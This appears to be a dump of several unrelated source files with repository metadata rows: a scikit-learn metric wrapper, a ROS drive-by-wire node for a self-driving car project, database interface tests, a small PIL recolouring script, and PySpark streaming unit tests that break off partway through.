self.raiseAnError(IOError, "Valid axis value should be '0' or '1' for the evaluate method of metric", self. name, "value", axis, "is provided!")
try:
value = self.__class__.availMetrics[self.metricType[0]][self.metricType[1]](x, y, **dictTemp)
except TypeError as e:
self.raiseAWarning('There are some unexpected keyword arguments found in Metric with type "', self.metricType[1], '"!')
self.raiseAnError(TypeError,'Input parameters error:\n', str(e), '\n')
return value
| 51.48125 | 156 | 0.653272 |
import numpy as np
import ast
from ...utils import utils
from .MetricInterface import MetricInterface
from ...utils import InputData, InputTypes
class SKL(MetricInterface):
availMetrics ={}
@classmethod
def getInputSpecification(cls):
inputSpecification = super().getInputSpecification()
inputSpecification.addSub(InputData.parameterInputFactory("metricType",contentType=InputTypes.StringType),quantity=InputData.Quantity.one)
inputSpecification.addSub(InputData.parameterInputFactory("sample_weight",contentType=InputTypes.FloatListType),quantity=InputData.Quantity.zero_to_one)
return inputSpecification
def __init__(self):
super().__init__()
if len(self.availMetrics) == 0:
import sklearn
import sklearn.metrics
self.availMetrics['regression'] = {}
self.availMetrics['regression']['explained_variance_score'] = sklearn.metrics.explained_variance_score
self.availMetrics['regression']['mean_absolute_error'] = sklearn.metrics.mean_absolute_error
self.availMetrics['regression']['r2_score'] = sklearn.metrics.r2_score
self.availMetrics['regression']['mean_squared_error'] = sklearn.metrics.mean_squared_error
if int(sklearn.__version__.split(".")[1]) > 17:
self.availMetrics['paired_distance'] = {}
self.availMetrics['paired_distance']['euclidean'] = sklearn.metrics.pairwise.paired_euclidean_distances
self.availMetrics['paired_distance']['manhattan'] = sklearn.metrics.pairwise.paired_manhattan_distances
self.availMetrics['paired_distance']['cosine'] = sklearn.metrics.pairwise.paired_cosine_distances
self.metricType = None
self._dynamicHandling = True
def handleInput(self, paramInput):
self.distParams = {}
for child in paramInput.subparts:
if child.getName() == "metricType":
self.metricType = list(elem.strip() for elem in child.value.split('|'))
if len(self.metricType) != 2:
self.raiseAnError(IOError, "Metric type: '", child.value, "' is not correct, please check the user manual for the correct metric type!")
else:
self.distParams[child.getName()] = child.value
if self.metricType[0] not in self.__class__.availMetrics.keys() or self.metricType[1] not in self.__class__.availMetrics[self.metricType[0]].keys():
self.raiseAnError(IOError, "Metric '", self.name, "' with metricType '", self.metricType[0], "|", self.metricType[1], "' is not valid!")
def run(self, x, y, weights=None, axis=0, **kwargs):
| true | true |
f7fa45ab027269032a18ee9b788e4395c7ec595c | 4,996 | py | Python | ros/src/twist_controller/dbw_node.py | Az4z3l/CarND-SuperAI-Capstone | a9b96618bcfb1a93a8e332b4132f3b7ce0213d4f | [
"MIT"
] | 1 | 2020-06-30T10:40:32.000Z | 2020-06-30T10:40:32.000Z | ros/src/twist_controller/dbw_node.py | Az4z3l/CarND-SuperAI-Capstone | a9b96618bcfb1a93a8e332b4132f3b7ce0213d4f | [
"MIT"
] | null | null | null | ros/src/twist_controller/dbw_node.py | Az4z3l/CarND-SuperAI-Capstone | a9b96618bcfb1a93a8e332b4132f3b7ce0213d4f | [
"MIT"
] | 2 | 2020-03-19T12:58:56.000Z | 2020-07-10T09:14:58.000Z | #!/usr/bin/env python
import rospy
from std_msgs.msg import Bool
from dbw_mkz_msgs.msg import ThrottleCmd, SteeringCmd, BrakeCmd, SteeringReport
from geometry_msgs.msg import TwistStamped
import math
from twist_controller import Controller
'''
This node will subscribe:
'dbw_enabled' --------> Boolean value represent whether dbw is enabled.
'throttle_cmd' -------> Proposed linear and angular velocity.
'current_velocity' ---> Current vehicle velocity.
This node will publish:
'steering_cmd' -------> Steer angle.
'ThrottleCmd' --------> Accelerate value.
'BrakeCmd' -----------> Brake torque.
'''
PUBLISH_RATE = 50
GAS_DENSITY = 2.858
ONE_MPH = 0.44704
class VehicleParams(object):
# Define a class containing all vehicle parameters.
def __init__(self):
self.vehicle_mass = None
self.fuel_capacity = None
self.brake_deadband = None
self.decel_limit = None
self.accel_limit = None
self.wheel_radius = None
self.wheel_base = None
self.steer_ratio = None
self.max_lat_accel = None
self.max_steer_angle = None
self.total_vehicle_mass = None
class DBWNode(object):
# Define a class running dbw node.
def __init__(self):
rospy.init_node('dbw_node')
ego_params = VehicleParams()
ego_params.vehicle_mass = rospy.get_param('~vehicle_mass', 1736.35)
ego_params.fuel_capacity = rospy.get_param('~fuel_capacity', 13.5)
ego_params.brake_deadband = rospy.get_param('~brake_deadband', .1)
ego_params.decel_limit = rospy.get_param('~decel_limit', -5)
ego_params.accel_limit = rospy.get_param('~accel_limit', 1.)
ego_params.wheel_radius = rospy.get_param('~wheel_radius', 0.2413)
ego_params.wheel_base = rospy.get_param('~wheel_base', 2.8498)
ego_params.steer_ratio = rospy.get_param('~steer_ratio', 14.8)
ego_params.max_lat_accel = rospy.get_param('~max_lat_accel', 3.)
ego_params.max_steer_angle = rospy.get_param('~max_steer_angle', 8.)
ego_params.total_vehicle_mass = ego_params.vehicle_mass + ego_params.fuel_capacity * GAS_DENSITY
self.steer_pub = rospy.Publisher('/vehicle/steering_cmd', SteeringCmd, queue_size=1)
self.throttle_pub = rospy.Publisher('/vehicle/throttle_cmd', ThrottleCmd, queue_size=1)
self.brake_pub = rospy.Publisher('/vehicle/brake_cmd', BrakeCmd, queue_size=1)
# Create "Controller" object, will return throttle, brake, steering.
self.controller = Controller(vehicle_params=ego_params)
self.current_vel = None
self.curr_ang_vel = None
self.dbw_enabled = True
self.linear_vel = None
self.angular_vel = None
self.throttle = self.steering = self.brake = 0
# Subscribers
rospy.Subscriber('/vehicle/dbw_enabled', Bool, self.dbw_enabled_cb)
rospy.Subscriber('/twist_cmd', TwistStamped, self.twist_cb)
rospy.Subscriber('/current_velocity', TwistStamped, self.velocity_cb)
self.loop()
def loop(self):
'''
Calculate the upcoming throttle, brake, and steering information.
Publish the calculated information.
Calculation and publish information all based on the set rate (50Hz).
'''
rate = rospy.Rate(PUBLISH_RATE)
while not rospy.is_shutdown():
if not None in(self.current_vel, self.linear_vel, self.angular_vel):
self.throttle, self.brake, self.steering = self.controller.control(self.current_vel,
self.dbw_enabled,
self.linear_vel,
self.angular_vel)
if self.dbw_enabled:
self.publish(self.throttle, self.brake, self.steering)
rate.sleep()
def dbw_enabled_cb(self, msg):
self.dbw_enabled = msg
def twist_cb(self, msg):
self.linear_vel = msg.twist.linear.x
self.angular_vel = msg.twist.angular.z
def velocity_cb(self, msg):
self.current_vel = msg.twist.linear.x
def publish(self, throttle, brake, steer):
'''
Given throttle, brake, steer values,
publish these values through 'throttle_cmd', 'brake_cmd' ,'steering_cmd' separately.
'''
tcmd = ThrottleCmd()
tcmd.enable = True
tcmd.pedal_cmd_type = ThrottleCmd.CMD_PERCENT
tcmd.pedal_cmd = throttle
self.throttle_pub.publish(tcmd)
scmd = SteeringCmd()
scmd.enable = True
scmd.steering_wheel_angle_cmd = steer
self.steer_pub.publish(scmd)
bcmd = BrakeCmd()
bcmd.enable = True
bcmd.pedal_cmd_type = BrakeCmd.CMD_TORQUE
bcmd.pedal_cmd = brake
self.brake_pub.publish(bcmd)
if __name__ == '__main__':
DBWNode()
| 35.685714 | 104 | 0.635909 |
import rospy
from std_msgs.msg import Bool
from dbw_mkz_msgs.msg import ThrottleCmd, SteeringCmd, BrakeCmd, SteeringReport
from geometry_msgs.msg import TwistStamped
import math
from twist_controller import Controller
PUBLISH_RATE = 50
GAS_DENSITY = 2.858
ONE_MPH = 0.44704
class VehicleParams(object):
def __init__(self):
self.vehicle_mass = None
self.fuel_capacity = None
self.brake_deadband = None
self.decel_limit = None
self.accel_limit = None
self.wheel_radius = None
self.wheel_base = None
self.steer_ratio = None
self.max_lat_accel = None
self.max_steer_angle = None
self.total_vehicle_mass = None
class DBWNode(object):
def __init__(self):
rospy.init_node('dbw_node')
ego_params = VehicleParams()
ego_params.vehicle_mass = rospy.get_param('~vehicle_mass', 1736.35)
ego_params.fuel_capacity = rospy.get_param('~fuel_capacity', 13.5)
ego_params.brake_deadband = rospy.get_param('~brake_deadband', .1)
ego_params.decel_limit = rospy.get_param('~decel_limit', -5)
ego_params.accel_limit = rospy.get_param('~accel_limit', 1.)
ego_params.wheel_radius = rospy.get_param('~wheel_radius', 0.2413)
ego_params.wheel_base = rospy.get_param('~wheel_base', 2.8498)
ego_params.steer_ratio = rospy.get_param('~steer_ratio', 14.8)
ego_params.max_lat_accel = rospy.get_param('~max_lat_accel', 3.)
ego_params.max_steer_angle = rospy.get_param('~max_steer_angle', 8.)
ego_params.total_vehicle_mass = ego_params.vehicle_mass + ego_params.fuel_capacity * GAS_DENSITY
self.steer_pub = rospy.Publisher('/vehicle/steering_cmd', SteeringCmd, queue_size=1)
self.throttle_pub = rospy.Publisher('/vehicle/throttle_cmd', ThrottleCmd, queue_size=1)
self.brake_pub = rospy.Publisher('/vehicle/brake_cmd', BrakeCmd, queue_size=1)
self.controller = Controller(vehicle_params=ego_params)
self.current_vel = None
self.curr_ang_vel = None
self.dbw_enabled = True
self.linear_vel = None
self.angular_vel = None
self.throttle = self.steering = self.brake = 0
rospy.Subscriber('/vehicle/dbw_enabled', Bool, self.dbw_enabled_cb)
rospy.Subscriber('/twist_cmd', TwistStamped, self.twist_cb)
rospy.Subscriber('/current_velocity', TwistStamped, self.velocity_cb)
self.loop()
def loop(self):
rate = rospy.Rate(PUBLISH_RATE)
while not rospy.is_shutdown():
if not None in(self.current_vel, self.linear_vel, self.angular_vel):
self.throttle, self.brake, self.steering = self.controller.control(self.current_vel,
self.dbw_enabled,
self.linear_vel,
self.angular_vel)
if self.dbw_enabled:
self.publish(self.throttle, self.brake, self.steering)
rate.sleep()
def dbw_enabled_cb(self, msg):
self.dbw_enabled = msg
def twist_cb(self, msg):
self.linear_vel = msg.twist.linear.x
self.angular_vel = msg.twist.angular.z
def velocity_cb(self, msg):
self.current_vel = msg.twist.linear.x
def publish(self, throttle, brake, steer):
tcmd = ThrottleCmd()
tcmd.enable = True
tcmd.pedal_cmd_type = ThrottleCmd.CMD_PERCENT
tcmd.pedal_cmd = throttle
self.throttle_pub.publish(tcmd)
scmd = SteeringCmd()
scmd.enable = True
scmd.steering_wheel_angle_cmd = steer
self.steer_pub.publish(scmd)
bcmd = BrakeCmd()
bcmd.enable = True
bcmd.pedal_cmd_type = BrakeCmd.CMD_TORQUE
bcmd.pedal_cmd = brake
self.brake_pub.publish(bcmd)
if __name__ == '__main__':
DBWNode()
| true | true |
f7fa45ec75b3960d95119de764163e3b74e4d488 | 5,767 | py | Python | remoteappmanager/db/tests/abc_test_interfaces.py | robertopreste/simphony-remote | 4b07ecd0cf7a66b534e215225bc4a97e903feabb | [
"BSD-3-Clause"
] | null | null | null | remoteappmanager/db/tests/abc_test_interfaces.py | robertopreste/simphony-remote | 4b07ecd0cf7a66b534e215225bc4a97e903feabb | [
"BSD-3-Clause"
] | 1 | 2021-07-30T11:01:56.000Z | 2021-07-30T11:01:56.000Z | remoteappmanager/db/tests/abc_test_interfaces.py | robertopreste/simphony-remote | 4b07ecd0cf7a66b534e215225bc4a97e903feabb | [
"BSD-3-Clause"
] | null | null | null | from abc import abstractmethod, ABCMeta
import inspect as _inspect
import string
from remoteappmanager.db.interfaces import ABCApplication, ABCApplicationPolicy
from remoteappmanager.db import exceptions
class ABCTestDatabaseInterface(metaclass=ABCMeta):
def assertApplicationEqual(self, app1, app2, msg=None):
args = _inspect.getargs(ABCApplication.__init__.__code__).args[1:]
for arg in args:
if arg == 'id':
# Skip the id because our comparison objects may not have them.
continue
if getattr(app1, arg) != getattr(app2, arg):
raise self.failureException(msg)
def assertApplicationPolicyEqual(self, policy1, policy2, msg=None):
args = _inspect.getargs(
ABCApplicationPolicy.__init__.__code__).args[1:]
for arg in args:
if getattr(policy1, arg) != getattr(policy2, arg):
raise self.failureException(msg)
@abstractmethod
def create_expected_users(self):
""" Return a list of expected users """
@abstractmethod
def create_expected_configs(self, user):
""" Return a list of (Application, ApplicationPolicy) pair for
the given user.
"""
@abstractmethod
def create_database(self):
""" Create an object that complies with ABCAccounting """
@abstractmethod
def test_get_user(self):
""" Test ABCDatabase.get_user """
def test_get_accounting_for_user(self):
""" Test get_accounting_for_user returns an iterable of ApplicationConfig
"""
database = self.create_database()
self.assertEqual(database.get_accounting_for_user(None), [])
for user in self.create_expected_users():
expected_configs = self.create_expected_configs(user)
actual_id_configs = database.get_accounting_for_user(user)
# should be ( (Application, ApplicationPolicy),
# (Application, ApplicationPolicy) ... )
actual_configs = tuple((accounting.application,
accounting.application_policy)
for accounting in actual_id_configs)
# Compare the content of list of (Application, ApplicationPolicy)
# Note that their order does not matter
self.assertEqual(len(actual_configs), len(expected_configs),
"Expected: {}, Actual: {}".format(
expected_configs, actual_configs))
temp = list(actual_configs)
for expected in expected_configs:
for index, actual in enumerate(temp[:]):
try:
self.assertEqual(actual[0], expected[0])
self.assertEqual(actual[1], expected[1])
except AssertionError:
continue
else:
temp.pop(index)
break
else:
self.fail('Expected {0} is not found in {1}'.format(
expected, actual_configs))
if temp:
self.fail('These are not expected: {}'.format(temp))
def test_get_accounting_for_user_mapping_id_rest_compliant(self):
''' Test if the mapping_id to be rest identifier complient '''
allowed_chars = set(string.ascii_letters+string.digits)
database = self.create_database()
for user in self.create_expected_users():
# should be ((mapping_id, Application, ApplicationPolicy),
# (mapping_id, Application, ApplicationPolicy) ... )
actual_id_configs = database.get_accounting_for_user(user)
if not actual_id_configs:
continue
for entry in actual_id_configs:
self.assertFalse(
set(entry.id) - allowed_chars,
"mapping id should contain these characters only: {} "
"Got : {}".format(allowed_chars, entry.id))
def test_list_users(self):
database = self.create_database()
expected_names = sorted([user.name
for user in self.create_expected_users()])
obtained_names = sorted([user.name
for user in database.list_users()])
self.assertEqual(expected_names, obtained_names)
def test_list_applications(self):
database = self.create_database()
expected_images = set()
for user in self.create_expected_users():
expected_images.update(
set([app.image
for app, _ in self.create_expected_configs(user)])
)
obtained_images = set(
[app.image for app in database.list_applications()]
)
self.assertEqual(expected_images, obtained_images)
def test_unsupported_ops(self):
db = self.create_database()
for method in [db.create_user,
db.create_application,
]:
with self.assertRaises(exceptions.UnsupportedOperation):
method("bonkers")
for method in [db.remove_user,
db.remove_application
]:
with self.assertRaises(exceptions.UnsupportedOperation):
method(id=12345)
for method in [db.grant_access, db.revoke_access]:
with self.assertRaises(exceptions.UnsupportedOperation):
method("bonkers", "uuu", 'key', True, False, "/a:/b:ro")
with self.assertRaises(exceptions.UnsupportedOperation):
db.revoke_access_by_id(12345)
| 37.940789 | 81 | 0.587134 | from abc import abstractmethod, ABCMeta
import inspect as _inspect
import string
from remoteappmanager.db.interfaces import ABCApplication, ABCApplicationPolicy
from remoteappmanager.db import exceptions
class ABCTestDatabaseInterface(metaclass=ABCMeta):
def assertApplicationEqual(self, app1, app2, msg=None):
args = _inspect.getargs(ABCApplication.__init__.__code__).args[1:]
for arg in args:
if arg == 'id':
continue
if getattr(app1, arg) != getattr(app2, arg):
raise self.failureException(msg)
def assertApplicationPolicyEqual(self, policy1, policy2, msg=None):
args = _inspect.getargs(
ABCApplicationPolicy.__init__.__code__).args[1:]
for arg in args:
if getattr(policy1, arg) != getattr(policy2, arg):
raise self.failureException(msg)
@abstractmethod
def create_expected_users(self):
@abstractmethod
def create_expected_configs(self, user):
@abstractmethod
def create_database(self):
@abstractmethod
def test_get_user(self):
def test_get_accounting_for_user(self):
database = self.create_database()
self.assertEqual(database.get_accounting_for_user(None), [])
for user in self.create_expected_users():
expected_configs = self.create_expected_configs(user)
actual_id_configs = database.get_accounting_for_user(user)
actual_configs = tuple((accounting.application,
accounting.application_policy)
for accounting in actual_id_configs)
self.assertEqual(len(actual_configs), len(expected_configs),
"Expected: {}, Actual: {}".format(
expected_configs, actual_configs))
temp = list(actual_configs)
for expected in expected_configs:
for index, actual in enumerate(temp[:]):
try:
self.assertEqual(actual[0], expected[0])
self.assertEqual(actual[1], expected[1])
except AssertionError:
continue
else:
temp.pop(index)
break
else:
self.fail('Expected {0} is not found in {1}'.format(
expected, actual_configs))
if temp:
self.fail('These are not expected: {}'.format(temp))
def test_get_accounting_for_user_mapping_id_rest_compliant(self):
allowed_chars = set(string.ascii_letters+string.digits)
database = self.create_database()
for user in self.create_expected_users():
actual_id_configs = database.get_accounting_for_user(user)
if not actual_id_configs:
continue
for entry in actual_id_configs:
self.assertFalse(
set(entry.id) - allowed_chars,
"mapping id should contain these characters only: {} "
"Got : {}".format(allowed_chars, entry.id))
def test_list_users(self):
database = self.create_database()
expected_names = sorted([user.name
for user in self.create_expected_users()])
obtained_names = sorted([user.name
for user in database.list_users()])
self.assertEqual(expected_names, obtained_names)
def test_list_applications(self):
database = self.create_database()
expected_images = set()
for user in self.create_expected_users():
expected_images.update(
set([app.image
for app, _ in self.create_expected_configs(user)])
)
obtained_images = set(
[app.image for app in database.list_applications()]
)
self.assertEqual(expected_images, obtained_images)
def test_unsupported_ops(self):
db = self.create_database()
for method in [db.create_user,
db.create_application,
]:
with self.assertRaises(exceptions.UnsupportedOperation):
method("bonkers")
for method in [db.remove_user,
db.remove_application
]:
with self.assertRaises(exceptions.UnsupportedOperation):
method(id=12345)
for method in [db.grant_access, db.revoke_access]:
with self.assertRaises(exceptions.UnsupportedOperation):
method("bonkers", "uuu", 'key', True, False, "/a:/b:ro")
with self.assertRaises(exceptions.UnsupportedOperation):
db.revoke_access_by_id(12345)
| true | true |
f7fa47561052691d4b48455dcaa0aa388dc50277 | 358 | py | Python | hard-gists/5808d73731b50f8abbdcb3c3c5c1e6fa/snippet.py | jjhenkel/dockerizeme | eaa4fe5366f6b9adf74399eab01c712cacaeb279 | [
"Apache-2.0"
] | 21 | 2019-07-08T08:26:45.000Z | 2022-01-24T23:53:25.000Z | hard-gists/5808d73731b50f8abbdcb3c3c5c1e6fa/snippet.py | jjhenkel/dockerizeme | eaa4fe5366f6b9adf74399eab01c712cacaeb279 | [
"Apache-2.0"
] | 5 | 2019-06-15T14:47:47.000Z | 2022-02-26T05:02:56.000Z | hard-gists/5808d73731b50f8abbdcb3c3c5c1e6fa/snippet.py | jjhenkel/dockerizeme | eaa4fe5366f6b9adf74399eab01c712cacaeb279 | [
"Apache-2.0"
] | 17 | 2019-05-16T03:50:34.000Z | 2021-01-14T14:35:12.000Z | from PIL import Image
if __name__ == "__main__":
im = Image.open("mr.zhang.jpg")
x, y = im.size
for i in range(x):
for j in range(y):
r, g, b = im.getpixel((i,j))
if (20< r < 180) and (80< g < 250) and (180< b< 265):
r, g, b = 255, 255, 255
im.putpixel((i, j), (r, g, b))
im.show()
| 29.833333 | 65 | 0.458101 | from PIL import Image
if __name__ == "__main__":
im = Image.open("mr.zhang.jpg")
x, y = im.size
for i in range(x):
for j in range(y):
r, g, b = im.getpixel((i,j))
if (20< r < 180) and (80< g < 250) and (180< b< 265):
r, g, b = 255, 255, 255
im.putpixel((i, j), (r, g, b))
im.show()
| true | true |
f7fa481d50235b6b7c21246d7eaf8f9e9c4fadf4 | 50,689 | py | Python | python/pyspark/streaming/tests.py | yongjiaw/spark | b25723af88412520aecab1aebaf12cb63c4d696c | [
"BSD-3-Clause-Open-MPI",
"PSF-2.0",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"MIT-0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause-Clear",
"BSD-3-Clause"
] | null | null | null | python/pyspark/streaming/tests.py | yongjiaw/spark | b25723af88412520aecab1aebaf12cb63c4d696c | [
"BSD-3-Clause-Open-MPI",
"PSF-2.0",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"MIT-0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause-Clear",
"BSD-3-Clause"
] | null | null | null | python/pyspark/streaming/tests.py | yongjiaw/spark | b25723af88412520aecab1aebaf12cb63c4d696c | [
"BSD-3-Clause-Open-MPI",
"PSF-2.0",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"MIT-0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause-Clear",
"BSD-3-Clause"
] | 2 | 2020-07-23T13:31:01.000Z | 2021-05-06T15:46:24.000Z | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import glob
import os
import sys
from itertools import chain
import time
import operator
import tempfile
import random
import struct
import shutil
from functools import reduce
try:
import xmlrunner
except ImportError:
xmlrunner = None
if sys.version_info[:2] <= (2, 6):
try:
import unittest2 as unittest
except ImportError:
sys.stderr.write('Please install unittest2 to test with Python 2.6 or earlier')
sys.exit(1)
else:
import unittest
from pyspark.context import SparkConf, SparkContext, RDD
from pyspark.storagelevel import StorageLevel
from pyspark.streaming.context import StreamingContext
from pyspark.streaming.kafka import Broker, KafkaUtils, OffsetRange, TopicAndPartition
from pyspark.streaming.flume import FlumeUtils
from pyspark.streaming.mqtt import MQTTUtils
from pyspark.streaming.kinesis import KinesisUtils, InitialPositionInStream
class PySparkStreamingTestCase(unittest.TestCase):
timeout = 10 # seconds
duration = .5
@classmethod
def setUpClass(cls):
class_name = cls.__name__
conf = SparkConf().set("spark.default.parallelism", 1)
cls.sc = SparkContext(appName=class_name, conf=conf)
cls.sc.setCheckpointDir("/tmp")
@classmethod
def tearDownClass(cls):
cls.sc.stop()
# Clean up in the JVM just in case there has been some issues in Python API
try:
jSparkContextOption = SparkContext._jvm.SparkContext.get()
if jSparkContextOption.nonEmpty():
jSparkContextOption.get().stop()
except:
pass
def setUp(self):
self.ssc = StreamingContext(self.sc, self.duration)
def tearDown(self):
if self.ssc is not None:
self.ssc.stop(False)
# Clean up in the JVM just in case there has been some issues in Python API
try:
jStreamingContextOption = StreamingContext._jvm.SparkContext.getActive()
if jStreamingContextOption.nonEmpty():
jStreamingContextOption.get().stop(False)
except:
pass
def wait_for(self, result, n):
start_time = time.time()
while len(result) < n and time.time() - start_time < self.timeout:
time.sleep(0.01)
if len(result) < n:
print("timeout after", self.timeout)
def _take(self, dstream, n):
"""
Return the first `n` elements in the stream (will start and stop).
"""
results = []
def take(_, rdd):
if rdd and len(results) < n:
results.extend(rdd.take(n - len(results)))
dstream.foreachRDD(take)
self.ssc.start()
self.wait_for(results, n)
return results
def _collect(self, dstream, n, block=True):
"""
Collect each RDDs into the returned list.
:return: list, which will have the collected items.
"""
result = []
def get_output(_, rdd):
if rdd and len(result) < n:
r = rdd.collect()
if r:
result.append(r)
dstream.foreachRDD(get_output)
if not block:
return result
self.ssc.start()
self.wait_for(result, n)
return result
def _test_func(self, input, func, expected, sort=False, input2=None):
"""
@param input: dataset for the test. This should be list of lists.
@param func: wrapped function. This function should return PythonDStream object.
@param expected: expected output for this testcase.
"""
if not isinstance(input[0], RDD):
input = [self.sc.parallelize(d, 1) for d in input]
input_stream = self.ssc.queueStream(input)
if input2 and not isinstance(input2[0], RDD):
input2 = [self.sc.parallelize(d, 1) for d in input2]
input_stream2 = self.ssc.queueStream(input2) if input2 is not None else None
# Apply test function to stream.
if input2:
stream = func(input_stream, input_stream2)
else:
stream = func(input_stream)
result = self._collect(stream, len(expected))
if sort:
self._sort_result_based_on_key(result)
self._sort_result_based_on_key(expected)
self.assertEqual(expected, result)
def _sort_result_based_on_key(self, outputs):
"""Sort the list based on first value."""
for output in outputs:
output.sort(key=lambda x: x[0])
class BasicOperationTests(PySparkStreamingTestCase):
def test_map(self):
"""Basic operation test for DStream.map."""
input = [range(1, 5), range(5, 9), range(9, 13)]
def func(dstream):
return dstream.map(str)
expected = [list(map(str, x)) for x in input]
self._test_func(input, func, expected)
def test_flatMap(self):
"""Basic operation test for DStream.faltMap."""
input = [range(1, 5), range(5, 9), range(9, 13)]
def func(dstream):
return dstream.flatMap(lambda x: (x, x * 2))
expected = [list(chain.from_iterable((map(lambda y: [y, y * 2], x))))
for x in input]
self._test_func(input, func, expected)
def test_filter(self):
"""Basic operation test for DStream.filter."""
input = [range(1, 5), range(5, 9), range(9, 13)]
def func(dstream):
return dstream.filter(lambda x: x % 2 == 0)
expected = [[y for y in x if y % 2 == 0] for x in input]
self._test_func(input, func, expected)
def test_count(self):
"""Basic operation test for DStream.count."""
input = [range(5), range(10), range(20)]
def func(dstream):
return dstream.count()
expected = [[len(x)] for x in input]
self._test_func(input, func, expected)
def test_reduce(self):
"""Basic operation test for DStream.reduce."""
input = [range(1, 5), range(5, 9), range(9, 13)]
def func(dstream):
return dstream.reduce(operator.add)
expected = [[reduce(operator.add, x)] for x in input]
self._test_func(input, func, expected)
def test_reduceByKey(self):
"""Basic operation test for DStream.reduceByKey."""
input = [[("a", 1), ("a", 1), ("b", 1), ("b", 1)],
[("", 1), ("", 1), ("", 1), ("", 1)],
[(1, 1), (1, 1), (2, 1), (2, 1), (3, 1)]]
def func(dstream):
return dstream.reduceByKey(operator.add)
expected = [[("a", 2), ("b", 2)], [("", 4)], [(1, 2), (2, 2), (3, 1)]]
self._test_func(input, func, expected, sort=True)
def test_mapValues(self):
"""Basic operation test for DStream.mapValues."""
input = [[("a", 2), ("b", 2), ("c", 1), ("d", 1)],
[(0, 4), (1, 1), (2, 2), (3, 3)],
[(1, 1), (2, 1), (3, 1), (4, 1)]]
def func(dstream):
return dstream.mapValues(lambda x: x + 10)
expected = [[("a", 12), ("b", 12), ("c", 11), ("d", 11)],
[(0, 14), (1, 11), (2, 12), (3, 13)],
[(1, 11), (2, 11), (3, 11), (4, 11)]]
self._test_func(input, func, expected, sort=True)
def test_flatMapValues(self):
"""Basic operation test for DStream.flatMapValues."""
input = [[("a", 2), ("b", 2), ("c", 1), ("d", 1)],
[(0, 4), (1, 1), (2, 1), (3, 1)],
[(1, 1), (2, 1), (3, 1), (4, 1)]]
def func(dstream):
return dstream.flatMapValues(lambda x: (x, x + 10))
expected = [[("a", 2), ("a", 12), ("b", 2), ("b", 12),
("c", 1), ("c", 11), ("d", 1), ("d", 11)],
[(0, 4), (0, 14), (1, 1), (1, 11), (2, 1), (2, 11), (3, 1), (3, 11)],
[(1, 1), (1, 11), (2, 1), (2, 11), (3, 1), (3, 11), (4, 1), (4, 11)]]
self._test_func(input, func, expected)
def test_glom(self):
"""Basic operation test for DStream.glom."""
input = [range(1, 5), range(5, 9), range(9, 13)]
rdds = [self.sc.parallelize(r, 2) for r in input]
def func(dstream):
return dstream.glom()
expected = [[[1, 2], [3, 4]], [[5, 6], [7, 8]], [[9, 10], [11, 12]]]
self._test_func(rdds, func, expected)
def test_mapPartitions(self):
"""Basic operation test for DStream.mapPartitions."""
input = [range(1, 5), range(5, 9), range(9, 13)]
rdds = [self.sc.parallelize(r, 2) for r in input]
def func(dstream):
def f(iterator):
yield sum(iterator)
return dstream.mapPartitions(f)
expected = [[3, 7], [11, 15], [19, 23]]
self._test_func(rdds, func, expected)
def test_countByValue(self):
"""Basic operation test for DStream.countByValue."""
input = [list(range(1, 5)) * 2, list(range(5, 7)) + list(range(5, 9)), ["a", "a", "b", ""]]
def func(dstream):
return dstream.countByValue()
expected = [[4], [4], [3]]
self._test_func(input, func, expected)
def test_groupByKey(self):
"""Basic operation test for DStream.groupByKey."""
input = [[(1, 1), (2, 1), (3, 1), (4, 1)],
[(1, 1), (1, 1), (1, 1), (2, 1), (2, 1), (3, 1)],
[("a", 1), ("a", 1), ("b", 1), ("", 1), ("", 1), ("", 1)]]
def func(dstream):
return dstream.groupByKey().mapValues(list)
expected = [[(1, [1]), (2, [1]), (3, [1]), (4, [1])],
[(1, [1, 1, 1]), (2, [1, 1]), (3, [1])],
[("a", [1, 1]), ("b", [1]), ("", [1, 1, 1])]]
self._test_func(input, func, expected, sort=True)
def test_combineByKey(self):
"""Basic operation test for DStream.combineByKey."""
input = [[(1, 1), (2, 1), (3, 1), (4, 1)],
[(1, 1), (1, 1), (1, 1), (2, 1), (2, 1), (3, 1)],
[("a", 1), ("a", 1), ("b", 1), ("", 1), ("", 1), ("", 1)]]
def func(dstream):
def add(a, b):
return a + str(b)
return dstream.combineByKey(str, add, add)
expected = [[(1, "1"), (2, "1"), (3, "1"), (4, "1")],
[(1, "111"), (2, "11"), (3, "1")],
[("a", "11"), ("b", "1"), ("", "111")]]
self._test_func(input, func, expected, sort=True)
def test_repartition(self):
input = [range(1, 5), range(5, 9)]
rdds = [self.sc.parallelize(r, 2) for r in input]
def func(dstream):
return dstream.repartition(1).glom()
expected = [[[1, 2, 3, 4]], [[5, 6, 7, 8]]]
self._test_func(rdds, func, expected)
def test_union(self):
input1 = [range(3), range(5), range(6)]
input2 = [range(3, 6), range(5, 6)]
def func(d1, d2):
return d1.union(d2)
expected = [list(range(6)), list(range(6)), list(range(6))]
self._test_func(input1, func, expected, input2=input2)
def test_cogroup(self):
input = [[(1, 1), (2, 1), (3, 1)],
[(1, 1), (1, 1), (1, 1), (2, 1)],
[("a", 1), ("a", 1), ("b", 1), ("", 1), ("", 1)]]
input2 = [[(1, 2)],
[(4, 1)],
[("a", 1), ("a", 1), ("b", 1), ("", 1), ("", 2)]]
def func(d1, d2):
return d1.cogroup(d2).mapValues(lambda vs: tuple(map(list, vs)))
expected = [[(1, ([1], [2])), (2, ([1], [])), (3, ([1], []))],
[(1, ([1, 1, 1], [])), (2, ([1], [])), (4, ([], [1]))],
[("a", ([1, 1], [1, 1])), ("b", ([1], [1])), ("", ([1, 1], [1, 2]))]]
self._test_func(input, func, expected, sort=True, input2=input2)
def test_join(self):
input = [[('a', 1), ('b', 2)]]
